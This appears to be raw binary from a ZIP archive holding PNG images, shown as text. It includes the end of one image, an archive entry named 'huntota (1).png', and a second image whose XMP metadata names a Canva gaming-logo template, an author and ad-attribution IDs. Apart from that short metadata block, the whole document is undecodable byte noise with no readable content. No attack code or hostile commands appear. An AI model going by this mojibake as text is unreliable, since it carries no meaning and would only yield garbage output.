�ޏ����e�khΨ�H�U}�T���L����5}�kC+X-�z���`2�A������ɽ]c�f9r;�$�%�.�����؈��T>G}��Ls�S�ι�iQ����<2͎'�$_�d��@��˗�`J,����@`c��m�*Xˣ�����A'��-�}�x�$��OS��� �=�76������QeY仹`��c��r&nBS��HsK��=�=�G&�`�")�6�1������ae 2�k~ <�ߠ=� '�rɰ3���[�>2���E��\�+@=[R���[�ȯ��0C��JGYS6����Ns�mH_����r5��+��Bo��|r���P�Od�>/��:�����h�f��da��X�j��j�˒�-ʘEw�:��ޭ�ߍ�`(Q���MpGCq(���QK�sz}4�Ԇ\{�5�\��<ܿ�qAz�D9A�!ӨԾH���Q+^oc�P28US.y͕� � �'�lֿ�04�l��Y¤v�yF�w�[_�{H�mP���R��S%��˰�f �� �K\�FOCk݃�����~� :����vv�=�k�,Ζ.���s��ğ:�~�Ϣ~�x.W�@�g�}�,cF��]�e�a�f�8��P�?R2�{�f��� 85f+������fY�>e ��rt_x"���������e��N>����J�l�&���a}��d��K�Aa�:-G')Z�48�&��7�:#�>P� c��ɉ� �"�&x9Y�X�b�b�XWX�>o*���?�e���5Ix���T(T#x�>����5kq~v�jE��m�x��ߦ�C� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@�#�a!M��' IEND�B`�PK R��Z��F�ڀ ڀ 951094867huntota (1).pngnu �[��� �PNG IHDR � � ��ߊ pHYs � ��+ �iTXtXML:com.adobe.xmp <?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?> <x:xmpmeta xmlns:x='adobe:ns:meta/'> <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'> <rdf:Description rdf:about='' xmlns:Attrib='http://ns.attribution.com/ads/1.0/'> <Attrib:Ads> <rdf:Seq> <rdf:li rdf:parseType='Resource'> <Attrib:Created>2025-03-16</Attrib:Created> <Attrib:ExtId>a964a1c3-9362-40f0-b792-4d634f44d966</Attrib:ExtId> <Attrib:FbId>525265914179580</Attrib:FbId> <Attrib:TouchType>2</Attrib:TouchType> </rdf:li> </rdf:Seq> </Attrib:Ads> </rdf:Description> <rdf:Description rdf:about='' xmlns:dc='http://purl.org/dc/elements/1.1/'> <dc:title> <rdf:Alt> <rdf:li xml:lang='x-default'>huntota - 1</rdf:li> </rdf:Alt> </dc:title> </rdf:Description> <rdf:Description rdf:about='' xmlns:pdf='http://ns.adobe.com/pdf/1.3/'> <pdf:Author>Usman Ali</pdf:Author> </rdf:Description> <rdf:Description rdf:about='' xmlns:xmp='http://ns.adobe.com/xap/1.0/'> <xmp:CreatorTool>Canva (Renderer) doc=DAGh7vlGL3I user=UAGW08pI-_I brand=BAFvEaRnRtA template=Dark Brown Orange Vector Gaming Team Logo</xmp:CreatorTool> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end='r'?>N�N� {�IDATx���y|T���g2K��%�l��e�J}�-j]����-u�X�Bն�Zk)��֥�JkE�h]^\@ �� �"�$���̾��0!&�L&������=��33<s�s�% � Nhq� = � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 � 0 �ut D/誖g�V��b�)��K:�K b�@N`��=:��9�,��xڹ:�� �p�s:����%���2�{��z�#� ��i ��%ɞ=P=�P�@G#ЁH��Qټ�r}��Ѿ������^�t�tU�t�y�5ڗ��d����Y� �R��+�k�/.1U�ߛ��Й0��B~�J����0���q����ݵ��n�{�� ЁN����˳wK���G_.Irn]����n�dt�;�l��[s����=D����$o��� @gD���'����c�I:��;dM�����I�@'�T>���K2�(���[���=��w� tR:� U��w���ő(G���$�]�$[ϓ۽o :'���K�����ݻUP��P(�h��fSZZ�Ғ�a)�� �vϊI�<���z�k�-w$�%�_�O�dM��n�й��r���XSn�5�zIv�z�'j�������5����h��W�oQ9G��m�c��E7��"�ѥ����i�ZU��)�ܩ��z득J��Ɲ�G_|�.���JHN��U�$y~���s������&�6 ��9�.e��骩�i��\��Vl/Դ��h�ȑ��� ڳe]���kux����g o�� �[}| '6]��>Ғ��K�nH�|�[^�͜�c9�E�����tU����W�z�S+I y��9��2����19�K7�c�Ҷ���N�yXU+綸���P\Rz�u��2ډ� s!��%��d�v����t�5qҭZ�`^��{3���R�zm�W �šKx����D�բ�}������r�CZ_�צ���H2����Ϛj]x�m�l�z��ߒ���K����<8C��~�M֯o�6=��r�z~�[��UkQ�WO�����K�tno{�촙Oh���k��b��":~\|�3t�#A�����!�azs�ݏ�����+kT��Gb�8'Y��'J�j�A�9�f��nnŃz�`��q Ɛ���5 ]��[�jcL���P@w~P�Cc,�5C�u�(#�7Tj�#w7��y�ܱ*�c�q�<.�~��諈�p��:Nx�%%*..Qii�JJJt`�J��%%%�j���<~#m��:�������į8%^y�zg�W� ]1�ed��w�\����q��� ^�2�ʓo\�w��${��MU`b:N(��M��u�Vm��S}�ysGw)�'Y,}~Я�y]yJ�$�7g&i]�_eΠf?x��z�p��5�:V��V����$��ڍ�J��y�z�5Q~ '�ޢ��2w�6lX���v=Vv�]Y�I�ꖦ>�����`�"��b�*]��9,�dяOM�Ί�&�)�f�$]?4A�mt��ku�Q�ܻ[����l�ug��G�槭n���@G���x��l�V������l�֦�[-����~�����z��y\/�8_�*%IUސFfڴ�̯E{��{a�y�0��mu���۳�応*����.�z,�}[Á��=D��}�د��j7���o_���xx(�����q�t��)zk����1�왗ސ�ٔ����;���&M�xI��t�Eg�ؕ_���4�sV���ޓdr4<��Ksex;�9�#�I�3��.m���N���uΘ������2��>P��Oo��ֽ�j�uo~h�� I҇�}�}T����i���?Fgc�?�a��ג'����1?o��ʹ57���R��&�:)���h�-���A���֏Z_P7�q���|7⺿��t7��-���#�uRJ���{��a�$U{��bM�|�{�곯�k���_[�2�4���U/F�7�n^,_�nYS{�i� ���SSS��?���,n��"� ���;~����N��I҇�>%�,��wRT�l8\nP]�KҮ-�+ɋ�Òj>Y��u��?r���&�כ�>�U��y�㒻�Y� ����r�t�ϯ�T��$������ބkoU�ݢ��J�A�:,��i ��e&_�]��P�?��fݛ�S%ɖ���Kn�>��m��Tʻ�X��b��4��@��C�wϽ���g�~�AV�̴iX��:.��И���b{�^rF��=0G�����l�^u�^^^^!-AwM����~!G��$�����Tu;�us ����[�n�-\�f� �Jnv_�/���Hԓ����R�-�>�������F��m��e�̧��Pid���-IRQm�3�K3.�WUWG��T������d��o�Kΐ$U.z4��X��k�Q@G!�s3�Oo�v�f�h�һ��W���&���6��˪�t�Wgf��܄������U�C.H 6�L�j}A=3cjD�I���8���@�f|圮���Z+�s����g��Q֤�$�۪�1�Ii��`mlG! h1�by���eTm�:�4��k�m�Ώ�U�N;�|��~���0��:��Ԝ�n��[��)��Ϙ2��]F�N���iV�*����=!N��$���dc�v�/�l�n �W�nkۯ�;�SU�~��{�}���ć%I���j%6kzvx;�V��=Fi �@GL͙=;���O�������?7����_�����}��t�O�������O�k�^��~#�o������N���'hq�>�$��MfkݮDG�?XV��_�-���{ɣ~��?�s�Y��j����(�1� ����),,�u�Z]����Kת�I��Y��S���Q����>�q��w�NҐn�Y�$};ۦ19v-���������+[ܿ�{��;�ɷ�n_zJb�ۍDټ� ~ci��3.R��g�g:�Zݶ����hW���>t��;o�ݪzC�S��k/jҟ���:c/��^�?W�)�τ?>��>���jу�$�"_x�u�'���>�<"Q�{�т�Mвg_�$�GB�_�ں���o�g����H�s�l�~�� ʹ�%y����a����|�# D�@G�,_�,�:�\y��^�MCƜq�!c��[���_�����4s�S=�tQ���F��nUNr�>���I�q�ˮ�.hT�)��I�N9j�o:Pc<07h�"�8-�ٻE�����Ô}�g�kU����/^�ܾ���>t�DmmmD���LҢ����'���4�䁚��+�Hh�+�Z��ѹ�� .�_p�Ck�|r�C:��]�6}q��l_�TuK�Lo�ku�nHۙ,�O��͋ux��M�;��H�z�����%ƹv|��h{:bb���Onr˕�i�:�ܶYի��34��'�{"-�j�I�Ɵ�?6���n��#�6��m.��^vW��sݪcc���%I��Mm�}MP��JUJ�A�|�9��Sm�@K�ׇ��V�ܦm������W�-�+ծ/Ί���)����O�N�1g��6e&��>s��jvzw���-�\�Wz�EC�Y��ⷎ���Ւ���;�-� ��A��9s�$ɚ��gj��yS�����K�=�s�#���[t��� b�@GL�z�1��=0So�҈����q�o����*��6qh�$���s�.w:��M;S���aՆ���.ش|��V�/~��'��º"���o2�Z����w�J�L�'?��_��9�a�%c�-~���1Q\R��ɗ��땑ջ�1c���n�Eo+��F ��W5e���m��Ҹ'> ݪ�y�O����J�F�O���;��69o�����ȧ��)4j���KR��Q鳷��ٴ��`e�����C�5m�.��舉8K�?�>��z��4�b֏��T͜n<���եJ���f^�t�����K�A�N��Ag@%{bq�N��Θ������~���e�^7Ŭ��7Қ>]qq�z嶌�v��M�kT��_�_��&�9�U�(g��u �@GLt�ѽ���3L�?�Dg]|U��]��a�����C� ^��רl�+~���pE���<d�88+Ǯ��8ݹ�F�n3VQ��nzٍ�~���+Y,�ٝ����Z9|��5�*�u�|�ѯ�~D|��m���舉�}�J�RRR�C�뱗�VRZF����k���K8�갨�6� �q��[w����ȷ$�p��ʢ|���1�ʨL�&-�/�z��v�9,Z�ߧ�8��˭�_|�����?��i,��x֍��n>} ����8k��=v����Օo���貛~�TG�yB�Wи�eSw2�{���+���o�->�As�/��۳�\����U����<Z}�'O@�t�# �;zn���AW�JfM�g�6kӹu��۬= �#�Æ�������<�g�b\v�Y��l�~�A����rwP5uA��^��`�^�gɚ&��Ӧӻ�� N�M�����U�-�O�r{��Y���3�T�S��goi�!m��J�ͻK��G�������S��Ӌj��f<�[y��ٶ?h?���}��y?��ɪ�5��5C��+����A�O��LҔ���ɲG_v�0*�O��ץ�9S�us���a���t�@G"��ey}�n��~A�#�Uԝ�[-F��:�*���E�6(ê��fmq)�jQ�;��3�_����l�z)a��}��|�>�k�w}��6<;$I���� h�� ���w`��Ɵٙ��=$tB�D��;�^;�rU��a��vE�"E�5$�ޓ�ef�c�Mv�����SO�w��}^"�S���j @�x.����V!��(�C��� ��cO}f�J�w�Z��)�X]�j�萙��>�?� ��n|�g��U�o��@z!,.�����[iT!Z��NIJ ��P���L9��]�<�U��±FY�� �w�Gk-��LRQ��� %ؼ����9yzO�d B�<�{��uW�����F?�k���۳��A�pJr��� �SB+��o�Z��K�5V!b�Q���2RQR����W��єo���9���(�������l;��Qg�k����5?�.jL�����'�27��BA'�r�����Sڈnz�(��l�d��� Pl��=�z�^���-��=����'�G���"���o�ݲw tc�F���6�� ˁu_/O�}f*P���� w��� ��u�<Z�w�� p�05 ���±&��� ��{������6�y*����A�h���]��n�xL� �& 7�BɾGQ���j�����HTɐ��A/�������MG{��65݃�k�B3xZ�k��9J���ېv�[��J��BkC�pJ�w����!Ǹ�L��6Na����^j� �go}�vi�TO����/���x4���{�����OALN�SvF|��#�L�U@+���!5߇�;>���А���i`Rr�֖��ێ�D�;7 ��wA)ԭ6.� ��|�"��ٷ�W\p�9>'Z�)���x�#ӄ��7�v�����g���+��?[��b���5(krD�|������:����+��w-E��#���䄼����`���9E� ���6d��V�@���N�~�a ��U�� �����i�W���k4�N�`��+C^c����;�Ĥ�c�����|x*�O�ᑱ���F�2t��ԉE�̸�W~)�|��Ո��o��fy�v䜠�eQ��8k�[<�"�S��$]%�P3.�'��6r��Ўۇ����4D'�Z��~� ��躯?Ĭ�&�ݟ6�ht��n� KO�at��t�?�������#U-�����s�Y�e&���_�Q�F��4��=���� y���H0�݂?����,��`S��B �C���17�����}��+�(��m\�_�q>�48x��ݍCF=��5sq��Ϡ�(��ޜ���U�����s��ɰ�t����*r��<%�<;�� ��j��m��[-~{��c;� ?����KC�w�ͨ~�v4��,�q��A'ty�{�u����SP����8hC���u��B��2�'z(�����C �M��['��lX*��3����$�r�c�� A�N�7��2�-No�B�P�q���ңO���?O8p��F쮉=Z7��(d��?�.1�s֯@ūW��/�y,!"�.������� ,��VN���#v,o��\Г5�~�3�s�Z,8g&�K���C�e����~��d�`�o� Y-Ò)����2'��z��xw�sz �Z���7a]it�j?{\S��9J�D��#z��$�K�üku�c!b���4>� U-�(_�݊��������auwX�s<�UF�^}���j�p��ӑ_i����*�g�t�?i�w���!���T��L�!U#��/6t��( n��x�3�E��e3�fŃA��'_ EV����;����Tx7�N �D� ]���E�B�� ���ʣvP�Qk~5#Dɿ;�yP���7�IKM�1\2g��$�;���RI��bA�2�։'Z�N�A��S�D�M�{����?�ł�M�g���xL�~�|�E���Ha�_�������C ���$�'�b��z?g�d�s<>:`�f��Y]8䷌����˼N� ��cGvn��9g��F�y��,9����FNy�i�@"?['Ó㵢c��#���0=W���9�6���ޣ�a�+A��9?ㆨ��P���Q����51��@8�!�N�,{�N�R: ,O�\��4�#����*ԟo�t�D��cG�}�����B�Iz){`2��$��#��J��' ��JgD���ION�����W[\x~k��`��4��j�� g� U�1Q?�z�o!Z�CL�"Ne�����w�M��c�����wU��^�b�[З�Hv�^ޟ-M����KQg��O���$-t춬7����%ȶ���J���*V4��b(<�����7����d�%��OY�B���`�l&�}��߿�D�BA't9^~���c�K�)(M���V��~^W�DQ��>�����HW1����־��L���Nj����5��=AJԆ�2�g ��~�l�f7���;A�Ѻ$��6h]RL϶lB�K�b��N ��A't)*��K6R9���n��-�g� �ӻ)`ay��W��~���þ�l���{�.�;X���i�3.��<<�� �g�'�(�u�C8�]�W��x|| �V�փ�(+z�I��߅L��]6�?��?.��~�T�:�K���ǂ���)ǡ_�CIS���ݽV��K���������nݹ/~ܿ��<�(n)=�i��C�� ��f�P`H ��!Ldz�ј���/E��b�қּ�<��o}�E�Y���e�3!D� ]�_6� z.Y%�3�I`��i��8y�e�"%�'ա���"��A�k�T��kkp�`UD�f�W�h<����b�K��Ϊc!�Qd�"u�6�u�p�B�˗�^�;�g]"�.Ö��ML���Qa����r��S��~ۼ3�o�i ���B's�8^���MA�_�_�.V�U2��]�k�h�O�ӻɽ�qR�%����2����#�26�?߆�F�����^%W��6.��o,�eϚ��A tU�����nv e�%e��B�Յc~���ܳ�C��i3f�<�$��(�_#�)� : ���k{^o�8����`��sD�){�D��-o�R��X��=O �JA'tv8�u���8�[^�����?���s��1����.oQ�Z8�4��IL�놥2p��� Q�_'b��4������OD҅���j>{��[���@��e8P!�ޜc�.��{�:��-�Y��k4q �>�GL㘖�v�y�Hurk�Y=}��Y�Ƽ�n��u�~�|��&���ӎ��$>��"�.�ѝ�#���ѷ��0`���]r�¨Ǒ���;�u��Z�n��_�����h:�c�'x�t=�ɗ> �Jӻ<p��|�@��A t���Ł���x�;� �'ϻ}S��k��~)�=IR���w����'�� : ؎�ZZ���y�.���! n�S"�.A}Me�$�����[�k2�/1:Aϯ��]k[21�W���:�1Ym��z�ȳ��=*��͠��V���m���9BW�:�K�TE_�}�so��^y�Y�ލ�=S"~f�(�ۋ .T�c3tiMF��&"U�l��F}OҼG��G�sD��\êW�~�Е �N������������pK��8e������M�WjL�WvY�_��K�,��@1��ΪcQ7T����~��Q�c-���`��;�Q=�@�JA't ����)��}M��Y}��_~�&�QL��w>\���T��6�d��D�P��[]8��u��I� 8n/���μ�<�Uk�V�ϺIt̰���M t���i�}�{���?���Ƣ�t��F�m��8���T���z���x}��[J�������X��.s�N�<ร�P��i⡟0?�{�;VA7�\�d߱���3�F�~�+@��e�>vH��X f�>o>t3�F���?V��?^��ӵ2�9.6i V�=1[�������58Xϡ�_B� c�}}������z����"��+���w�a�n��%���S"�.��{[�>fey����0e�(|����{�/#���G��7;၀c �;�F�F�/�cNFk)�X�I�E�X˲����ɐg�����4:> �1�Gu�i��O��ڗCa��GL�'Nv����G��Q�[�Y V��=&���G�����<I%C���n��q ��ȗ�g�){yg�'ȝ0 �}���کz���y��.s#���Ƣ�r��Y]gU�#�x�ًv�e5��~�d�:�K��!>���H�4:���?���k��w���c��|H ���X�d_;�-�{kY���z��f�t{���z�-|�Ι O�p��/�i,������c�tc���� ?1#NV����9x���;��5V�H��ɰ��)Z��ʠ��³��EHc�ugѿ�� �~ r;�Y(�:��WvWg�`����9S}������ ��p+9�Du� �^�ͳ0n�&��"�.����ni����\�� q������"n����j'�����F;����_����o[n�`?��$d�-�� ���^ ��� ߱���I�#tY���$so~ �?q7�L۵1����ƻ�]�V���㕔wY{�A�U����W<jGa���-᰻�N��3��? �a�7��a�+�mpH�����c��}�@�g,d�����Y%�"AwV���a��pk�c#:3D� ]�9��_}����v{�A�������u�>�W�g�1��"L�f���^�y�X��m��oOU�I`d��6,�Z5��L��߲-u�IQ]�=Ev�g���#0��e�刣�+B�Х�=r"~X��M�.��W��T�̻B��/J�'�f'�'������_�~��-������-� � /����uH���{@2�K�~0ղ���p�`�J�ħ���>�N�F����=-�p2@���Q�����?��_��٣��P����O��>z�8�+���E���|h3��� ^u��O��{o�5@D[���<Iq:?{�Q������pf��z߄ų,.�匒����<5�R6\Su�2=ϊ'C�j_���f�}pB'�:ᔡ��x��5��O�`�$�����=#5�xv&g�E��/���\��+� �ා�;gǟ'�}t 09y,��6��jYo�ʽ����;<��3��k�ܦ3��:N�B�/�d*]��&O��.�-�D�.q���x��۱�B[@�p��o�ix��ﰭ��~�~L���?�R��K�%��&h��8 �l_W��p�#�?bG�ߞ�o��r���� `�+LN�+�~-v�@+�Mon=�ӯ�'B� �Vb��:o�; ��A�_)��C�Yu,�]-t��/������X�m�}�])e��U�t�)��+oŻ�6`o�1|�������;��JQ�ĉ|ڧ�(���8��S!���V|Q�K$�������n�t)��w���<L6~�����F3B+�p�@��$���ݢ+�]M�M�z|�P�B�.<��e�SJ� ��vd��3�ڢ��"���3��/-�gnŒE��i�'1(h����&T��N��p�( >��)��A�4߆�vY�z��]��p��{Q�o��U�u,�G�~���oey��WwYqno�,�´�����Iʆ��0 ��, t��\`7�$e{��.�O�3� ��tA���wnKPR�c����X��_� p�V�'�k�����s@0���o�~_��6Թ'�2��[+#�^U�@���f��c4��G��֪�3��n�X/y�K�X XB�L�����:N��o���ge�PL�v �� tA����@�F:BlpG��V��IZ|V`�տD�܃��5]��St^�����x�D��!j|[h��}�~/v ��gcy�*�R#���$-fu-p��w���bU��]�u�R�A)5��R��"O\���pT�~fR�yf+a+�ퟫ����"�BN�W�Z������iz�i w�5������G�1xz�_����)�~��ԉ~�r����"^�܄��2'8HV��K�~5`c��h�7Cﵜ ����;`T�OЛ�}G���������<B��a?��Y�3��i�ޟ)F�ع�2>��A�@��P[��� $�YX!ym�&3j�.t����=.�ªc\�����t�7U�s�p�H r�b/�{e���U�����\��kM��:� #��̀�;,h��$O�7�鑡 �мk��;������5�y�ϒ��n �{��pV5�Q��ټ�G��I���v ��!�N H�{ݯ���d�:�_cķ��u�Ux�4��3��`f~� ��9��h�/��ôEȌz)�M.\�So��h�L�OO�"����q���5��[����Qjt!7�Ʋ�u�q�t�VA='*����Ε�(l�`ϞŇ�"1�Q8 �z� ���u���3�i����J���.��ZP��XLΒ��z|Q`�kM�k���?S���X�s�7�a��9��u2��k��?Nl(sbK�Gd%i�;�k�9zF��11K�ԯ���E�;�^A��*\"C7�Ĺ:����7pxh���<8Z�d �w Q�����uyjwo�7���ɾ':)D� t��먗�b�1;����|^`C��T�w����X�݂u%N�+qbz���)�3>p�}|�ܻ�}��öJ'�V�ʔ](1��l�8ynn%��B��U����N$�e^��z��o0I^����k�xf��S����-��v�IowD�f�4 ��f�y�/��qS�n���tA����"